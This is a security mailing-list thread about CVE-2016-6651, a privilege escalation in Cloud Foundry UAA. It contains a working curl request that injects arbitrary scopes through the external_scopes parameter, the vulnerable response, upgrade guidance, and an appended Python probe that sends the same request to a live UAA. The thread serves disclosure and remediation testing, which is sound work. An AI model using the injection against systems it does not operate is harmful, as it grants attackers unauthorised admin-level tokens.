Re: [HIGH] CVE-2016-6651: Privilege Escalation in UAA


Molly Crowther
 

Hello all,

In the interest of full public disclosure, the CFF Security Team would also
like to share some additional information about this vulnerability that
will aid in testing and remediation. Please let us know if you have any
questions or concerns.

Thanks,
Molly Crowther
Cloud Foundry Foundation Security Team

Description of Vulnerability

The vulnerability exposes an untested parameter that lets any application
add arbitrary scopes (permissions) to an access token.

curl https://login.urlredacted.com/oauth/token \
  -H "Accept: application/json" \
  -u "cf:" \
  -d "username=<username here>" \
  -d "password=<password here>" \
  -d "client_id=cf" \
  -d "grant_type=password" \
  -d "response_type=token" \
  -d "external_scopes=cloud_controller.test"

A vulnerable system will return the following response:

{
  "access_token": "redacted for readability",
  "expires_in": 599,
  "jti": "redacted for readability",
  "refresh_token": "redacted for readability",
  "scope": "openid … cloud_controller.test",
  "token_type": "bearer"
}

cloud_controller.test is an arbitrary string, but may as well be
cloud_controller.admin.

Applications that perform off-line validation will happily accept the
inserted string as a permission. Applications that use online validation,
i.e. the /check_token UAA API endpoint, are not vulnerable - the UAA
validates the permissions against what's in the database (uaadb).

A patched system will ignore the external_scopes parameter completely, and
cloud_controller.test will not be returned in the response.

On Mon, Sep 26, 2016 at 11:23 AM, Molly Crowther <mcrowther(a)cloudfoundry.org> wrote:

CVE-2016-6651: Privilege Escalation in UAA

Severity

High

Vendor

Cloud Foundry Foundation

Versions Affected

- Cloud Foundry release v242 and earlier versions
- UAA release v3.7.0 & earlier versions
- UAA bosh release (uaa-release) v16 & earlier versions

Description

A privilege escalation vulnerability has been identified with the
/oauth/token endpoint in UAA allowing users to elevate the privileges in
the token issued.

Mitigation

OSS users are strongly encouraged to follow one of the mitigations below:

- Upgrade to Cloud Foundry v243 [1] or later
- For standalone UAA users:
  - For users using UAA Version 3.0.0 - 3.7.0, please upgrade to UAA
    Release v3.7.3 [2], v3.4.5 [3] or v3.3.0.6 [4]
  - For users using standalone UAA Version 2.X.X, please upgrade to UAA
    Release v2.7.4.8 [5]
  - For users using UAA bosh release, please upgrade to UAA-Release v17
    [6] if upgrading to v3.7.3 [2], v12.6 [7] if upgrading to v3.4.5 [3] or
    v11.7 [8] if upgrading to v3.3.0.6 [4]

Credit

SAP HCP Security Team

References

- [1] https://github.com/cloudfoundry/cf-release/releases/tag/v243
- [2] https://github.com/cloudfoundry/uaa/releases/tag/3.7.3
- [3] https://github.com/cloudfoundry/uaa/releases/tag/3.4.5
- [4] https://github.com/cloudfoundry/uaa/releases/tag/3.3.0.6
- [5] https://github.com/cloudfoundry/uaa/releases/tag/2.7.4.8
- [6] https://github.com/cloudfoundry/uaa-release/releases/tag/v17
- [7] https://github.com/cloudfoundry/uaa-release/releases/tag/v12.6
- [8] https://github.com/cloudfoundry/uaa-release/releases/tag/v11.7

History

2016-09-26: Initial vulnerability report published
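The remediation check from the reply above, written out as an added example (it is not part of the advisory and not UAA project code). It assumes only what the thread shows: a password-grant POST to /oauth/token carrying a probe value in the external_scopes parameter, and a JSON token response whose "scope" field is a space-separated string. The probe scope cloud_controller.test is the harmless, non-existent scope the advisory uses; an unpatched UAA echoes it back, a patched one ignores the parameter. The scopes_from_jwt helper shows why off-line validators are affected: they read the scope claim straight from the token the issuer signed. The sample responses and the unsigned token inside them are constructed for the example; the live path runs only when UAA_URL, UAA_USERNAME and UAA_PASSWORD are set in the environment (those variable names are this example's own).

```python
"""Remediation check for CVE-2016-6651 (added example, not UAA project code)."""
import base64
import json
import os
from typing import Dict, Set
from urllib.parse import urlencode
from urllib.request import Request, urlopen

# Harmless, non-existent scope used as the probe, as in the advisory.
PROBE_SCOPE = "cloud_controller.test"


def build_probe_form(username: str, password: str,
                     probe_scope: str = PROBE_SCOPE) -> Dict[str, str]:
    """Form fields of the advisory's curl command, with the probe scope injected."""
    return {
        "username": username,
        "password": password,
        "client_id": "cf",
        "grant_type": "password",
        "response_type": "token",
        "external_scopes": probe_scope,
    }


def granted_scopes(token_response: Dict) -> Set[str]:
    """UAA returns scopes as one space-separated string; split it into a set."""
    return set(token_response.get("scope", "").split())


def scopes_from_jwt(access_token: str) -> Set[str]:
    """What an off-line validator sees: the 'scope' claim read from the JWT payload.
    No signature check here on purpose; a correctly signed token from an unpatched
    UAA carries the injected scope as a claim, so the signature does not help."""
    payload_b64 = access_token.split(".")[1]
    payload_b64 += "=" * (-len(payload_b64) % 4)  # restore base64url padding
    payload = json.loads(base64.urlsafe_b64decode(payload_b64))
    return set(payload.get("scope", []))


def accepts_external_scopes(token_response: Dict,
                            probe_scope: str = PROBE_SCOPE) -> bool:
    """True when the issuer echoed the injected scope, i.e. the system is unpatched."""
    return probe_scope in granted_scopes(token_response)


def probe_uaa(base_url: str, username: str, password: str,
              probe_scope: str = PROBE_SCOPE) -> bool:
    """Live form of the advisory's curl test, for a UAA you operate."""
    body = urlencode(build_probe_form(username, password, probe_scope)).encode()
    req = Request(base_url.rstrip("/") + "/oauth/token", data=body, method="POST")
    req.add_header("Accept", "application/json")
    # -u "cf:" in the advisory: the 'cf' client authenticates with an empty secret.
    req.add_header("Authorization", "Basic " + base64.b64encode(b"cf:").decode())
    with urlopen(req) as resp:
        return accepts_external_scopes(json.load(resp), probe_scope)


def _fake_jwt(claims: Dict) -> str:
    """Constructed three-part token for the samples below (not signed by anything)."""
    def enc(obj: Dict) -> str:
        return base64.urlsafe_b64encode(json.dumps(obj).encode()).decode().rstrip("=")
    return enc({"typ": "JWT"}) + "." + enc(claims) + ".constructed-signature"


# Constructed sample responses, modelled on the advisory's output.
VULNERABLE_RESPONSE = {
    "access_token": _fake_jwt({"scope": ["openid", "cloud_controller.read", PROBE_SCOPE]}),
    "expires_in": 599,
    "scope": "openid cloud_controller.read " + PROBE_SCOPE,
    "token_type": "bearer",
}
PATCHED_RESPONSE = {
    "access_token": _fake_jwt({"scope": ["openid", "cloud_controller.read"]}),
    "expires_in": 599,
    "scope": "openid cloud_controller.read",
    "token_type": "bearer",
}

if __name__ == "__main__":
    env = os.environ
    if all(env.get(v) for v in ("UAA_URL", "UAA_USERNAME", "UAA_PASSWORD")):
        unpatched = probe_uaa(env["UAA_URL"], env["UAA_USERNAME"], env["UAA_PASSWORD"])
    else:
        unpatched = accepts_external_scopes(VULNERABLE_RESPONSE)
    print("external_scopes honoured (unpatched):", unpatched)
    print("scopes an off-line validator would trust:",
          sorted(scopes_from_jwt(VULNERABLE_RESPONSE["access_token"])))
```

Run it against a UAA you administer after applying one of the upgrades listed in the advisory; a patched system returns False because the injected scope never appears in the response. The scopes_from_jwt output makes the second point of the reply concrete: anything that trusts the token's own scope claim, rather than asking /check_token, inherits whatever the issuer put there.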
